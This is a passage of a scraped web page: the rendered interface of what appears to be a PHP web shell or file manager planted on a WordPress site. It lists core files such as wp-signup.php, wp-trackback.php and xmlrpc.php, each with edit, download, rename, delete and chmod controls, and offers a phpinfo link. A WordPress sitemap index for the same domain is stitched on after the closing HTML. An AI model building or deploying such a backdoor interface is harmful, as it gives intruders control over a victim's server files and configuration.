                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-settings.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-signup.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">33.71 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-signup.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-signup.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-signup.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-signup.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-signup.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-signup.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-signup.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            wp-trackback.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">5.09 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fwp-trackback.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fwp-trackback.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fwp-trackback.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/wp-trackback.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fwp-trackback.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete wp-trackback.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/wp-trackback.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                        <tr>
                <td>📄</td>
                <td>
                                            xmlrpc.php                                    </td>
                <td style="font-family:monospace; font-size:11px">0644</td>
                <td style="font-size:12px">3.13 KB</td>
                <td class="actions">
                                            <a href="?edit=%2Fhome%2Fbiafer%2Fwww%2Fxmlrpc.php&dir=%2Fhome%2Fbiafer%2Fwww">✏️ Edit</a>
                        <a href="?download=%2Fhome%2Fbiafer%2Fwww%2Fxmlrpc.php">⬇️ Download</a>
                        <a href="?view=%2Fhome%2Fbiafer%2Fwww%2Fxmlrpc.php&dir=%2Fhome%2Fbiafer%2Fwww">👁️ View</a>
                                        
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="rename" value="/home/biafer/www/xmlrpc.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="newname" placeholder="new name" size="10">
                        <button type="submit">Rename</button>
                    </form>
                    
                    <a href="?delete=%2Fhome%2Fbiafer%2Fwww%2Fxmlrpc.php&dir=%2Fhome%2Fbiafer%2Fwww" 
                       class="delete-btn" 
                       onclick="return confirm('⚠️ Delete xmlrpc.php permanently?')">🗑️ Delete</a>
                    
                    <form method="GET" style="display:inline">
                        <input type="hidden" name="chmod" value="/home/biafer/www/xmlrpc.php">
                        <input type="hidden" name="dir" value="/home/biafer/www">
                        <input type="text" name="perms" placeholder="0755" size="5">
                        <button type="submit">Chmod</button>
                    </form>
                </td>
            </tr>
                    </tbody>
    </table>
    
    <!-- PHP Info Link -->
    <hr>
    <a href="?phpinfo=1" target="_blank">🔧 System Information (phpinfo)</a>
    </div>
</body>
</html><?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://www.biafer.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://www.biafer.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://www.biafer.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://www.biafer.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://www.biafer.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
